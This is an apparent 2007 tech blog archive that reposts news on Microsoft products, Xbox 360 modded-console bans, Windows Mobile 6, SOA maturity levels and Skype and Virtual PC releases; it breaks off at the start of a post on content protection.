The notion that SOA is currently making more sense to business that it is to IT is gaining steam. Likewise, it follows that IT is actually inhibiting SOA, though it's not categorical pushback, David Linthicum writes, just caution around the issues. "I spend more time going after hearts and minds than pushing the technology and approach,"

he adds. "The technology is easy, hearts and minds are not." Sustainable

IT: While the U.S. government sets high standards for hardware makers, IT vendors such as Dell, IBM and HP "have been raising that bar even higher, scrutinizing not... ...

More of this blog:

http://newsletter.infoworld.com/t?ctl=1782A10:B6DDBA76EF261945CA79A75E2D538D91EFF29049075316B4

| Trackback | # 
 Friday, May 18, 2007
Friday, May 18, 2007 5:01:28 PM UTC ( EN | microsoft | tech | xbox )

[QUOTE]
With the amount of posts we see on our forums ... it's clear, Microsoft decided to start banning Xbox360 with modified firmwares today (both Hitachi-LG and Toshiba-Samsung drives).

While it's the same release date as Halo3 beta, it seems that people who didn't download Halo3 also get banned. They probably detect backup discs (and not the modified firmware) when you play 'em online (not confirmed yet).
Even people using the new firmwares with disc-jitter added get banned, so it looks like Microsoft found another way to detect it. However we also see reports of people with modified firmwares that are not banned (yet). Microsoft is known to ban with delay though, so it'll probably take a while before we got a good view on who got banned for what reasons.
Just like on Xbox1 it looks like Microsoft bans the console unique ID (serial), not the LIVE user. Microsoft will not allow anyone to login on LIVE on a banned console.

Many people on the official xbox.com forums also claim they got banned but didn't have a flashed firmware ... we'll have to see how that story develops in the coming hours and days.

Xbox-Scene
Picture by Eraser77.
This is what you get when you go to test connection and after xbox live fails click on network adapter

Update: This was just posted on Microsoft's Games Global Marketing team blog:
One of the great things about LIVE and the unified community is that we work hard to create a level playing field for all gamers and have a no tolerance policy towards inappropriate behavior like hacking or cheating. As part of our commitment to our members, we do not allow people that we have detected to have modified their console to connect to LIVE. This is an important part of our efforts to try and maintain a fair gaming environment for the large majority of gamers that play by the rules. This topic is more important than ever given the recent release of the Halo 3 beta. As a result, some consumers that try to login to LIVE who we detect have illegally modified their console will get an error code (Status Code: Z: 8015 - 190D) when trying to connect to the service. These users will not have their account automatically banned from LIVE, but they will no longer be able to access the service from the console they modified.
We have stated in the past that customers can only enjoy access to the Xbox LIVE community through the use of a genuine, unmodified, Xbox console and we will continue to enforce this rule to ensure the integrity of our service, the protection of our partners and the benefits of our users.
[/QUOTE]

Source: www.xbox-scene.com/

| Trackback | # 
 Tuesday, May 15, 2007
Tuesday, May 15, 2007 7:39:46 PM UTC ( EN | internet | markets | microsoft | tech )

[QUOTE]
One beta ends and suddenly five more spring up in its place. We can finally get the talk around Windows Live going again - the Windows Live Folders site has just opened up in preparation for the beta. (Please note the beta has not yet started, so the site will not work correctly.)

So how does it work? Windows Live Folders allows you to upload your files to the cloud, providing access to them from an internet browser (both IE and Firefox are supported). The key part is using Windows Live ID to limit access to the files you have uploaded, allowing you to keep them private, share them with contacts, or make them public. With Windows Live, it's the sum of the parts that gives it so much potential. Here's a summary of the Folders service:

Personal

  • Use personal folders to back up important files that are only for you.
  • Get to your files from any computer with Internet access by signing in with your Windows Live ID.

Shared

  • Shared folders make it easy to collaborate with coworkers or classmates.
  • You decide how much control each person has over each shared folder. Some can just read what's there: others can add and delete files.
  • Everyone who is sharing uses their own Windows Live ID.

Public

  • With public folders, anyone on the Internet can view your files, but they can't change them.
  • Want to show your public files to others? Just send them a link! Each folder and file has its own web address.

The beta service looks to only be offering 500MB initially, with a maximum file size of ~50MB but as we've seen with the just-launched Windows Live Hotmail, internet services need to be scaled up carefully. There's no Windows Live Folders client available for download either, undoubtably a key part of the "Live Drive" package, but lets not get too disappointed yet. The beta we've all been waiting for is almost here.

A brief review and screenshots is available separately as this post got too long.

Windows Live Folders homepage

[/QUOTE]

Update: The site has been taken down for now. Subscribe to RSS feed to find out when the beta starts for good.

Source: liveside.net/blogs/

| Trackback | # 
 Tuesday, May 08, 2007
Tuesday, May 08, 2007 10:37:10 AM UTC ( EN | markets | microsoft | multimedia | office | tech )

[QUOTE]
Everyone's got their own idea about how we're gonna get our work done in the future, and except for the camp that envisions us toiling away in the silicon mines for our robotic overlords, most of these concepts seem to have converged around a few of the same elements. Well Microsoft was showing off its Center for Information Work's take on the ideal workstation at Convergence 07, and the so-called DigiDesk does indeed incorporate many features we've seen before, including a multi-touch display (we know, we know), document digitizer, speech recognition engine, and ability to resize objects on the fly a la Jeff Han's famous TED presentation. Of course Redmond conveniently neglected to tell us when we can expect to to find the DigiDesk at our local Office Depot, meaning that like most of these neat-o concepts, a YouTube vid (after the break) is probably the closest you're gonna get to this tech for a long time.
[/QUOTE]

Source: www.engadget.com

| Trackback | # 
 Monday, March 26, 2007
Monday, March 26, 2007 11:19:25 AM UTC ( coolstuff | EN | multimedia | tech | xbox )

You can now stream your favorite videos from your computer to your TV, via the Xbox 360, PS3 or Wii with a free Client called Orb. Orb enables you to play any videos from your PC or from the Internet on your TV, via your Xbox 360, PS3, Wii.

 

The software and service are FREE. And there’s no additional Hardware to buy or install, and no subscriptions to sign up for.

Get Orb here: http://www.orb.com

| Trackback | # 
 Wednesday, March 14, 2007
Wednesday, March 14, 2007 11:58:54 PM UTC ( EN | microsoft | tech )

[QUOTE]
Microsoft has released a major update to its server operating system, designed to make the product more stable and secure.

Windows Server 2003 Service Pack 2 has been in beta since November, and was tested by twice as many users as Microsoft's previous Service Pack 1 update, released in March 2005.

Microsoft released the service pack with little notice, prompting one administrator to complain Tuesday on her blog.

"You gave us admins a heads up before XP sp2 was Microsoft updated out to our boxes," wrote Susan Bradley, [cq] chief technology officer with Tamiyasu, Smith, Horn and Braun, Accountancy Corp. [cq] "Why can't you give us a heads up on this?"

This latest update can be applied to all versions of Windows Server 2003, as well as to Windows XP Professional, X64 edition, Microsoft said. It includes a number of new features including:

  • Scalable Networking Pack -- tools that help speed up networking intensive tasks
  • Windows Deployment Services -- allows administrators to set up new Windows systems remotely over the network
  • Wi-Fi Protected Access 2 -- makes it easier for users to securely connect to wireless networks
  • Microsoft Management Console 3.0 - the latest version of Microsoft's management tools
  • Improved IPsec and Firewall management features.

[/QUOTE]

Source: http://www.infoworld.com/article/07/03/14/HNserver2003update_1.html?source=NLC-TB&cgd=2007-03-14

| Trackback | # 
 Saturday, March 10, 2007
Saturday, March 10, 2007 2:18:13 PM UTC ( EN | tech | vista )

Will you upgrade to Vista for DirectX 10? You just might after seeing these pictures.

DirectX 9

DirectX 10

One of the main (only?) improvements in Vista for gamers would be the inclusion of DirectX 10. And to make gamers upgrade, they made DirectX 10 a Vista exclusive. Is it worth it?

| Trackback | # 
 Thursday, March 08, 2007
Thursday, March 08, 2007 5:00:21 PM UTC ( coding | EN | microsoft | tech )

Last Thursday, March 1st 2007, the new Software Development Kits (SDKs) for Windows Mobile 6 were published to MSDN.  Together with Visual Studio 2005, the Windows Mobile 6 SDKs provide everything a developer needs to build and test applications on Windows Mobile 6.

In the 1st week of availability we’ve had more than 30,000 downloads of the Windows Mobile 6 SDKs!  That’s 10x more than the first week the Windows Mobile 5.0 SDKs were published.  This demonstrates the increased interested in Windows Mobile as well as the value of creating the perception of application market opportunity by announcing platform + device + operator rather than just platform as we have in the past.  Good work Chuck and co!

You can download the SDKs here.

Stay tuned!  On May 1st 2007 we’ll be publishing an SDK Refresh featuring new emulators and enhanced documentation as well as releasing the new Windows Mobile 6 Developer Resource Kit DVD.

What’s are the benefits of Windows Mobile 6 for developers?

· Windows Mobile 6 makes it easier to build and deploy line of business applications

o .NET Compact Framework 2.0 and SQL Server Compact Edition are both built in saving time and cost in distribution and deployment

· Windows Mobile 6 provides great compatibility for Windows Mobile 5.0 applications

o Existing developers benefit from the additional reach provided by Windows Mobile 6 without having to do additional work

· Windows Mobile 6 makes it easier to build one application that runs on many devices

o The new device emulator provides better cell phone emulation and has built in GPS functionality making it possible to test a wider variety of applications

o Development frameworks like ScreenLib make it easier to build an app that adapts to different screen sizes

You can read the “What’s New” article on MSDN to find out more.

What are the benefits of the SDK?

The Windows Mobile 6 SDK together with Visual Studio 2005 contains everything a developer needs to build and test applications for Windows Mobile 6 including :

· Platform Documentation (both API level and How-To guidance)

· More than 100 sample applications

· Tools and utilities to enhance the development process : Cell Emu, Hopper, Fake GPS, CabSign and many more

· Emulator images for a wide range of device form factors

How are we letting developers know about the SDK?

Our planned “soft launch” is performing considerably better than we expected!  Awareness activities include :

· Windows Mobile Newsletter inclusion (developer version)

· Developer Evangelism Newsletter (DPE Field)

· MSDN Windows Mobile Homepage posting

Blog postings.  Windows Mobile Team Blog. Program Manager's Blog.

| Trackback | # 
 Wednesday, March 07, 2007
Wednesday, March 07, 2007 1:41:51 PM UTC ( EN | markets | microsoft | tech )

[QUOTE]
The product, which will be known as Microsoft Office Communications Server 2007, brings with it the ability for companies to integrate VOIP (voice over IP) technology into existing telephony infrastructure. This server is also the successor to Microsoft Live Communications Server 2005, and forms part of Microsoft's unified communications portfolio.

"It brings with it voice and conferencing capabilities for on-premise voice, video and Web conferencing, and integrates them together at the application layer for a unified user experience," Chris Cullin, the director of product management in Microsoft's Unified Communications Group, said.

"It also provides a single applications infrastructure, a single point of administration and configuration, and a single directory, for the IT professional."

Last year, Microsoft announced its unified communications vision and roadmap going forward, where executives talked about introducing voice technologies to its current lineup, developing new products and expanding the unified communications features its current products provide.

Communications Server 2007 users will be able to deploy enterprise-wide presence, enable security-enhanced enterprise instant messaging, host on-premise audio, video and Web conferences, and deploy VOIP capabilities.

Voice features includes placing and receiving voice calls, advanced call routing and streamlined integration with the new unified messaging capabilities in Exchange Server 2007.

Other features are multiparty conferencing, call holding, and forwarding and transferring, as well as compliance capabilities—all of which work in conjunction with the existing telephony infrastructure.

One of the benefits that using VOIP brings to enterprises is in business process integration.

A recent report from analyst firm Gartner said that "the ultimate driver of VOIP is not merely cost savings, but is in business process integration. Enterprises should evaluate their long-term strategy toward developing IP telephony applications beyond basic telephony, including business application integration."

The new voice server will also allow workers to instantly launch a phone call from a number of Office 2007 system applications, such as Word 2007, Outlook 2007 and Office Communicator.

Users will be able to click on a colleague's name to determine his or her availability and initiate a person-to-person or multiparty call.

While Cullin declined to give details of the roadmap for the product going forward or around its pricing and packaging, he did say that it was on track to ship by the end of the second quarter of 2007.

Office Communications Server is also a platform for developers and gives them a set of APIs and open standards based on SIP (Session Initiation Protocol), as well as an applications development environment where people could build line of business or vertical applications on top of the solution set, he said.

Communications Server 2007 and Microsoft Office Communicator, which is part of the 2007 Microsoft Office system, have native support for SIP, and interoperate with products from industry partners including Nortel Networks, Alcatel-Lucent, Avaya, Cisco Systems, LG-Nortel, NEC Philips Unified Solutions and Siemens Communications.

Through these relationships, customers worldwide will be able to support VOIP using their existing desktop phones, data networks and time division multiplexing or IP private branch exchanges, he said.

Customers will also be able to leverage the capabilities of Office Communicator to make and receive phone calls from their PCs, eliminating the need to buy expensive IP-compatible phones.

Office Communications Server 2007 is also integrated with Microsoft Exchange Server 2007, which has a built-in auto-attendant for answering and routing inbound voice calls as well as unified messaging that unifies voicemail and e-mail in a single inbox, Cullin said.
[/QUOTE]

The full story: http://www.eweek.com/article2/0,1895,2071184,00.asp

| Trackback | # 
 Monday, March 05, 2007
Monday, March 05, 2007 11:28:06 AM UTC ( EN | microsoft | tech )

[QUOTE]
Take a look at how far virtualisation will go on the next Windows Server Operating System "Longhorn"

 

In this demo you will see:

  • Windows Server Virtualization running on Server Core managed from another Windows Server Longhorn box
  • 64-bit hosts and 32-bit hosts and a Linux running on the same server core box
  • An 8-core virtual machine
  • System Center Virtual Machine Manager
  • System Center Operations Manager
  • Monitoring the VMs on the Server Core box
  • Fire off a PowerShell script to hot-add another NIC to a SQL VHD Image

[/QUOTE]

Source: http://www.schrankmonster.de/PermaLink,guid,5d595eff-7420-4e67-b529-013a1d1b97e8.aspx

| Trackback | # 
Monday, March 05, 2007 11:20:34 AM UTC ( EN | multimedia | tech )

[QUOTE]
Bad news MPAA, good news fair use folk: this weekend not only marks the date of extraction for PowerDVD's AACS key (which, as you may recall, is one of the two HD disc-playing apps in Windows right now along with the already cracked WinDVD), but also signals the release of AnyDVD 6.1.2.9, which officially adds Blu-ray support.
[/QUOTE]

Full Story: engadget.com | forum.doom9.org | forum.slysoft.com

| Trackback | # 
Monday, March 05, 2007 11:15:55 AM UTC ( EN | games | microsoft | tech | xbox )

[QUOTE]
SAN FRANCISCO — March 4, 2007 — At the Game Developers Conference (GDC) 2007, Microsoft Corp. today announced plans to launch a 512MB Memory Unit for the Xbox 360™ video game and entertainment system and an increase in the official size limit of Xbox LIVE® Arcade games from 50 MB to 150 MB.

The 512MB Memory Unit, available worldwide beginning April 3, 2007, will retail for an estimated retail price of $49.99 (U.S.) in North America.* The 512MB Memory Unit will be pre-loaded with the hit Xbox LIVE Arcade game “Geometry Wars: Retro Evolved” from developer Bizarre Creations Ltd. for a limited time. The original 64MB Memory Unit will simultaneously drop in price from $39.99 to $29.99 (ERP).*

Eight times larger than the 64MB Memory Unit, the 512MB Memory Unit will provide Xbox 360 owners with vastly expanded storage capabilities for gaming on the go, allowing gamers to easily store and transport their gamer profile and save game data, Xbox LIVE Arcade games and Xbox LIVE Marketplace content. The 512MB Memory Unit also gives Xbox 360 owners the ability to download exclusive content from any of the 45,000 Xbox 360 kiosks accessible at retail outlets worldwide.

Beginning today, the Xbox LIVE Arcade game size limit has increased from 50 MB to 150 MB, giving developers greater flexibility in game design and expanding the opportunity to add advanced game features while still keeping games compact.

“The new size limit offers developers increased flexibility and continued opportunities for innovative game development, while also ensuring that the millions of gamers on Xbox LIVE can continue to easily access, download and play all Xbox LIVE Arcade games on Xbox 360,” said Chris Early, product unit manager for Xbox LIVE Arcade and Microsoft Casual Games at Microsoft. “If you take a look at current games like ‘Roboblitz’ and ‘Small Arms,’ it’s clear that our developers deliver amazing game experiences within a compact size limit. Our focus is on continuing to provide developers with an environment that allows for the creation of cost-efficient games and that nurtures an artistic and creative approach to game development.”

“As we prepare to launch our first Xbox LIVE Arcade game, ‘Boom Boom Rocket,’ we’re able to see how dynamic and creative this platform is,” said Chip Lange, vice president of Online Commerce for Electronic Arts Inc. (EA). “Having ‘Wing Commander Arena’ on Xbox LIVE Arcade allows us to take full advantage of the online play and bring to life a 16-player online arcade experience that delivers unparalleled arcade action.”

This week at GDC, Microsoft will showcase forthcoming Xbox LIVE Arcade games from a cross-section of genres to the game development community:

  • “Boom Boom Rocket” (EA and Bizarre Creations). This eagerly anticipated title from EA and Bizarre Creations is a hypnotic rhythm music game that will launch on Xbox LIVE Arcade this spring, priced at 800 Microsoft Points.
  • “3D Ultra™ Minigolf Adventures” (Sierra Online and Wanako Games). The first outdoor sports game on Xbox LIVE Arcade, “3D Ultra Minigolf Adventures” lets players putt their way through 36 fun-filled holes on wild courses that include settings such as the Classic Carnival and the fantastical Outer Space.
  • “Eets: Chowdown” (Klei Entertainment Inc.). A completely revamped version of the popular PC title, “Eets: Chowdown” offers a fun puzzle game experience unlike anything else available on Xbox LIVE Arcade, and features new items and 120 new levels.
  • “Jetpac Refuelled” (Rare Ltd.). This is a new take on Rare/Ultimate’s 1983 classic space blaster with enhanced graphics and Xbox LIVE features; players must clear a path through hordes of aliens to refuel their ship and amass a fortune over the course of more than 100 high-definition levels.
  • “Pinball FX” (ZEN Studios Ltd.). “Pinball FX” offers an unparalleled pinball experience that will be fun for novices and experts alike, with realistic ball physics and stunning 3-D tables. “Pinball FX” also features real-time, head-to-head competition over Xbox LIVE and Xbox LIVE Vision camera support.

About Xbox LIVE Arcade
Xbox LIVE Arcade on Xbox 360 is the premier destination for digitally distributed high-definition games. Xbox LIVE Arcade is a fast-growing phenomenon with more than 20 million game downloads and a diverse library of original development and classic titles from the world’s best independent and established developers and publishers. With a dynamically updated library and free** trials for every title, Xbox LIVE Arcade makes it easy for every type of gamer — from casual to hard-core — to get instantly immersed in the fun. Xbox LIVE Arcade also lets friends connect and play these incredible games either from the same room or from around the world via the Xbox LIVE online entertainment network. More information can be found online at http://www.xbox.com/en-us/games/livearcade.
[/QUOTE]

Source: http://www.microsoft.com/presspass/press/2007/mar07/03-04512MBMemoryUnitPR.mspx

| Trackback | # 
 Tuesday, February 27, 2007
Tuesday, February 27, 2007 5:21:48 PM UTC ( EN | markets | microsoft | tech )

[QUOTE]
Windows Mobile 6 will begin appearing in smart phones, primarily, from a variety of service providers and hardware makers, beginning next quarter and throughout 2007. Unfairly characterized in some online reports as "Windows Mobile Vista," Windows Mobile 6 does feature a default theme that is indeed more akin to Vista's Aero UI than it is previous Windows Mobile versions. But Windows Mobile 6 doesn't honestly have anything to do with Vista beyond this surface sheen. Instead, it's a logical and desirable upgrade to what was already arguably the smartest smart phone platform around.

That said, Windows Mobile 6 isn't just for smart phones. It will ship in three versions on devices, including Windows Mobile 6 Classic (for PDAs), Windows Mobile 6 Standard (for smart phones) and Windows Mobile 6 Professional (for smart phones with touch-screen displays, similar to the previous Pocket PC Phone Edition). In the future, these versions may simply disappear as Microsoft is working towards a single code base for all Windows Mobile devices.
....
[/QUOTE]

More on: winsupersite.com

| Trackback | # 
 Monday, February 26, 2007
Monday, February 26, 2007 10:15:08 AM UTC ( EN | tech | vista )

Now that Windows Vista has shipped to consumers, it's time to start enumerating through each new feature of the OS. In Paul Thurrott's Winsupersite you can find a Windows Vista Feature Focus series.

The following Windows Vista Feature Focus showcases are currently available:

64-Bit (x64) Support Updated!
Anti-Phishing Technologies
Automatic Disk Defragmentation Updated!
Backup and Recovery Center
BitLocker Full Drive Encryption
Games Explorer and Windows Games
Internet Explorer 7.0
Internet Information Server
Kernel Patch Protection
Live Taskbar Thumbnails Updated!
Network and Sharing Center
Network Projection
Power Management
Previous Versions (Windows ShadowCopy)
Remote Desktop
Setup and Installation Improvements
Subsystem for Unix-Based Applications
Sync Center
System Search
Tablet PC Functionality and Touch Screen Support
Themed Slide Shows
User Account Control Updated!
Welcome Center
Windows Aero User Interface
Windows Anytime Upgrade
Windows Calendar New!
Windows Classic User Interface
Windows Defender
Windows DVD Maker
Windows Easy Transfer
Windows Explorer
Windows Fax and Scan
Windows Firewall
Windows Flip and Windows Flip 3D Updated!
Windows Mail
Windows Media Center
Windows Media Center Xbox 360 Media Center Extender
Windows Media Player 11
Windows Meeting Space
Windows Mobility Center
Windows Movie Maker 6 Updated!
Windows Photo Gallery
Windows ReadyBoost
Windows ReadyDrive
Windows Security Center
Windows Service Hardening
Windows Sidebar
Windows SideShow
Windows Ultimate Extras
Windows Update and Automatic Updates
Windows Vista Basic User Interface Updated!
Windows Vista Standard User Interface
Windows Vista Fonts
XPS and PDF Document Support

| Trackback | # 
 Thursday, February 22, 2007
Thursday, February 22, 2007 10:07:25 PM UTC ( DE | microsoft | tech | xbox )

[QUOTE]
Microsoft hat einen Weg gefunden, die Geräuschentwicklung der Xbox360 durch ein Software-Update deutlich zu verringern.

Microsoft liefert seit Kurzem ein Software-Update an die Fachpresse aus, das die Xbox360 wesentlich leiser macht. Durch das Update wird den Spieleherstellern die Möglichkeit gegeben, die Laufwerkgeschwindigkeit der Box herunterzufahren. Bisher läuft das Laufwerk bei Spielen nämlich immer mit voller Geschwindigkeit - oder gar nicht.

Aktuell funktioniert das Update nur auf speziellen Debug-Boxen. Wir gehen aber davon aus, dass Microsoft in Kürze auch herkömmliche Xbox360-Konsolen per Update ruhigstellt.

Microsofts Plattform-Manager Boris Schneider-Johne sprach schon auf der Games Convention 2006 davon, die Laufwerkgeschwindigkeit zu drosseln. Bei Spielen, die regelmäßig Daten in den Speicher streamen, würden die Hersteller aus Timing-Gründen ohnehin nie das volle Tempo nutzen.
Allerdings könnten sich die Ladezeiten bei Spielen durch das Software-Update etwas verlängern. Bei einer derart drastischen Senkung des Geräuschpegels sollte dies aber zu verschmerzen sein.
[/QUOTE]

Quelle: cynamite.de

| Trackback | # 
Thursday, February 22, 2007 10:07:06 PM UTC ( EN | internet | markets | microsoft | multimedia | tech | xbox )

[QUOTE]
Microsoft will showcase the Xbox 360's IPTV service for the first time in Europe at The Connected Home Show at London's Olympia next month.
Ed Graczyk, Worldwide Director of Marketing and Communications for Microsoft TV will demonstrate the service during his keynote at the conference, specifically showcasing what happens when "next-generation television is combined with next-generation gaming in a unique, new service delivered by your broadband provider".

IPTV is expected to be available as early as Christmas 2007 in Europe, and telecom providers BT, Deutsche Telekom and T-Online in France have already chosen Microsoft IPTV Edition as their IPTV software choice.
[/QUOTE]

More at computerandvideogames.com.

| Trackback | # 
Thursday, February 22, 2007 10:02:08 PM UTC ( coolstuff | EN | microsoft | tech | vista | xbox )

[QUOTE]
There's a reason why gamers choose the Xbox 360 Wireless Controller over other gamepads; it delivers a mean combination of precision, speed and accuracy. Windows gamers can take advantage of the Xbox 360 Wireless Controller and other Xbox 360 wireless accessories with the Xbox 360 Wireless Receiver for Windows, which is now available on store shelves.


As a great gift for yourself or for fellow gamers, the Xbox 360 Wireless Receiver for Windows costs $19.99 (MSRP) and is available at retailers across North America including, GameStop, Wal-Mart and Circuit City. For gamers that need both a wireless controller and receiver, Microsoft is offering the Xbox 360 Wireless Controller for Windows which includes both the receiver and controller in one package for $59.95 (MSRP).

The Xbox 360 Wireless Receiver for Windows opens up a whole new world of Windows gameplay by allowing the Xbox 360 Wireless Controller for Windows, Xbox 360 Wireless Headset and Xbox 360 Wireless Racing Wheel to work on any Windows Vista or Windows XP (SP1 or higher)-based PC.
[/QUOTE]

Source: TeamXbox.com, xbox-scene.com

| Trackback | # 
Thursday, February 22, 2007 12:06:13 PM UTC ( EN | tech )

Skype rolled out a new beta today, version 3.1. It's a rather minor rev with an interesting and potentially useful new feature. I say potentially because there's not a whole lot of content yet behind the new SkypeFind feature. According to Skype reps you can think of it as a "user-generated location guide that lets the Skype community share, rate and review local businesses."

The Skype 3.1 beta is available today, but keep in mind that it is a beta, and might have a rough edge here or there but does seem pretty stable (I've been using it all day).

Changes in the 21.02.2007 version 3.1.0.112 BETA change log:  

  • New features:
    • Skype Find (more on this later)
    • Account Panel redesign
    • Alerts Platform
    • Typing indicator (Tools > Options > Advanced > Chat > "Show When I'm Typing")
  • New features for programmers:

    • possible to get contact's avatar and get and set own avatar
    • GET CONTACTS_FOCUSED
    • SET RINGTONE <id> STATUS ON|OFF
    • GET PREDICTIVE_DIALER_COUNTRY
    • CALL property TARGET_IDENTITY
  • bugfix:

    • API: after joining calls to conference VIDEO_(SEND|RECEIVE)_STATUS RUNNING was erroneously sent
    • API: ongoing call was not put on hold while answering another incoming call
    • API: notification of clicking MENU_ITEM in Tools returned user_id
  • Known issue:

    • SkypePM.exe may show a 'DLL Initialization Failed' error message on shutting down Windows.
| Trackback | # 
 Monday, February 19, 2007
Monday, February 19, 2007 10:01:16 PM UTC ( EN | microsoft | tech )

The new Virtual PC 2007 with support for Windows Vista as a guest and a host, improved performance, hardware virtualization, 64-bit host support and PXE boot is available now.  In addition the Virtual PC web-site has been completely redesigned.  Check it out here: http://www.microsoft.com/windows/products/winfamily/virtualpc/default.mspx.

Key new collateral on the web-site includes:

1) “See the demo”: A new autorun demonstration that explains the two key application compatibility tools Virtual PC 2007 and ACT 5.0 in detail.

2) “Virtual PC 2007 Application Compatibility Whitepaper” describing how Virtual PC 2007 assists users with their application compatibility issues.

3) “Virtual PC 2007 Technical overview” updated from 2004.

Whether Microsoft virtualization technology is an important component of your existing infrastructure or you're just a Virtual PC enthusiast, you can now download Virtual PC 2007 absolutely free.

| Trackback | # 
Monday, February 19, 2007 9:54:23 PM UTC ( coding | EN | markets | SOA | tech )

[QUOTE]
As I have been doing client work recently I've come across the notion of "SOA Levels" more than once, as consulting and product organizations attempt to define the space for their customer and client base. One of the common patterns is the fact that many seem to be over simplifying SOA, in short defining this notion around components and not degrees of maturity. While components are important, a maturity model is much more important, considering that products will change over time, but architectural patterns have a tendency to remain constraint.

Just to recall, here is my take on things, as discussed a few years ago. I'm still going to say: "That's my story and I'm sticking to it."

Level 0 SOAs are SOAs that simply send SOAP messages from system to system. There is little notion of true services, but instead leverage Web services as an information integration mechanism. Hardly a SOA, but certainly a first step.

It's also important to note that you don't need Web services to create a SOA. This is true for all levels.
Level 1 SOAs are SOAs that also leverage everything in Level 0 but add the notion of a messaging/queuing system. Most ESBs are level 1 SOAs, leveraging a messaging environment that uses service interfaces, but really does not deal with true services (behavior), but instead moves information between entities as messages through queues.

While services are a part of Level 1 SOAs, it's really all about information and not about application behavior. For instance, while you do indeed invoke a service to push a message on queue and retrieve a message off a queue, it's really leverages services as a well defined interface and not accessing application functionality. Sometime SOA architects may attempt to abstract application behavior using an ESB, if that's the case you're moving up to level 4 (discussed below). However, doing this is typically much more trouble than it's worth. This is due to the fact that you're dealing with information-oriented integration technology which is merely attempting to deal with services/behavior...an unnatural act.
Level 2 SOAs are SOAs that leverage everything in Level 1, and add the element of transformation and routing. This means that the SOA is not only able to move information from source and target systems, leveraging service interfaces, but is also able to transform the data/schemas to account for the differences in application semantics. Moreover, by adding the element of intelligent routing, you�re able to route the information based on elements such as source, content, and logical operators in the SOA.

Level 3 SOAs are SOAs that leverage everything in Level 2, adding a common directory service. The directory provides a point of discover of processes, services, schemas, and such, allowing all those leveraging the SOA to locate and leverage assets such as services easily. Without directories, the notion of service reuse, the real reason for building a SOA won�t work. Directories are typically standards-based, including UDDI, LDAP, and sometimes more proprietary directories such as Active Directory.

Level 4 SOAs are SOAs that leverage everything in Level 3, adding the notion of brokering and managing true services. Here is where the brokering of application behavior comes into play. In other words, at this level we are not only about managing information movement, but the discovery and leveraging of true services.

At this level we have the capabilities to broker services between systems, allowing systems to both discover and leverage application behavior as if the functionality was local. This is the real goal of Web services, the ability to share services not having to worry about platform specific issues nor where the service are actually running.

What's important here is that we understand that the value is in the behavior, as well as the information bound to that behavior. This level of SOA is able to provide capabilities for discovery, access, and management. Most SOAs are built with level 4 capabilities in mind, but may workup from the lower levels. If you do that, make sure you are leveraging the right technology and standards that support all levels.

Finally, Level 5 SOAs are SOAs that leverage everything in Level 4, adding the notion of orchestration. Orchestration is key, providing the architect with the ability to leverage exposed services and information flows, creating in essence a "meta-application" above the existing processes and services to solve business problems.

Indeed, orchestration is really another complete layer on the stack, over and above more traditional application integration approaches we deal with at the lower levels. Thus, orchestration is the science and mechanism of managing the movement of information and the invocation of services in the correct and proper order to support the management and execution of common processes that exist in and between organizations and internal applications. Orchestration provides another layer of easily defined and centrally managed processes that exist on top of an existing processes, application services, and data within any set of applications.

The goal of this type of SOA is to define a mechanism to bind relevant processes that exist between internal and external systems in order to support the flow of information and logic between them, thus maximizing their mutual value. Moreover, we're looking to define a common, agreed-upon process that exists between many organizations and has visibility into any number of integrated systems, as well as being visible to any system that needs to leverage the common process model.


As services, and architectures that support them, become more of an asset within the enterprise, we need to begin learn how to categorize the patterns of the architectures, thus the SOA levels discussion in this blog. This both provides a better understanding of what is a true SOA, and also allows us to pick the right level to meet the needs of our business.
[/QUOTE]

Source: weblog.infoworld.com
| Trackback | # 
Monday, February 19, 2007 1:00:02 AM UTC ( EN | games | internet | markets | microsoft | multimedia | tech | vista | xbox )

[QUOTE]
Microsoft Corp. (NASDAQ:MSFT) chairman Bill Gates unveiled a slew of new products and content partners Sunday in his keynote address kicking off the 2007 International Consumer Electronics Show, vowing to deliver access to video and data no matter where the consumer might be.

"It's a dream if you're a sports fan or there's a sports fan in your house," said Robbie Bach, president of Microsoft's entertainment and devices division and the company's chief liaison to Hollywood. Bach and Gates alternated introducing new products during Microsoft's CES presentation.

In addition, Microsoft said that it has signed Lionsgate (NYSE:LGF) to its roster of programming contributors to Xbox 360 Live Marketplace, joining Paramount and Warner Bros. Bach hailed the addition of a library of video content to Xbox Live that either can be streamed or downloaded, noting that 100 million downloads of games, TV episodes and movies have been generated over the past 13 months; he did not offer a separate account of how video alone has fared since Microsoft signed content partners including ABC, Comedy Central and the CW as of Nov. 22. Xbox 360 also will provide an IPTV service that can deliver video programming, essentially functioning as a set-top box.

Although that doesn't put Microsoft in the video distribution business, it opens up the possibility that the company could partner with AT&T (NYSE:SBT) (NYSE:T) to offer a mix of voice, video, data and wireless. Microsoft already provides software for AT&T's IP-based rollout, raising the specter that the telco's current U.S. service, U-Verse, could eventually be bundled with Xbox 360.

IPTV video has DVR and video-on-demand functionality and also will enable seamless switching between video programming and games, and even blur the two, demonstrating functionality that allowed a community of users to talk to their Xbox even while its in TV mode.
[/QUOTE]

Full Story: money.cnn.com

| Trackback | # 
 Friday, February 16, 2007
Friday, February 16, 2007 1:39:48 PM UTC ( coolstuff | EN | internet | microsoft | multimedia | tech )

Microsoft unleashed its Soapbox Web video platform (its YouTube competitor) to the unwashed masses yesterday, taking the service out of private beta. The service has a clean and simple layout, and manages to keep both the MSN moniker and the often-clunky Windows Live Login (formerly .NET Passport). What baffles me about this is that despite having access to all your personal information, Soapbox won't parse your Windows Live ID to fill in simple profile information like your name and location, unless you've recently gone through and updated it since opening a Hotmail account in the 90s. Nor will it go through your Windows Live e-mail to see if you want to share any videos that have been sent to you by friends. If Microsoft is aiming for no-nonsense integration with its Web services, it's sadly not there yet.

That being said, Microsoft did add the ability to post videos in your blog, which was one of the original Soapbox criticisms. The catch is that it has to be a Windows Live Spaces blog. Alternatively, there are the standard permalinks and embed codes for you to send to friends or put on your blog or Web site.

Below I've embedded one of my favorite videos. Note the fact you can access both share codes and description from the player itself. Neat.


Video: Amazingly Cool Ad

| Trackback | # 
 Sunday, February 11, 2007
Sunday, February 11, 2007 8:12:17 PM UTC ( coding | EN | tech | xbox )

Nate Lawson (co-designer of the Blu-Ray content protection layer) published a presentation at the RSA 2007 Conference comparing the content protection schemes used on the Commodore64 vs. the Xbox360 ... showing things aren't all that different today:

[QUOTE]
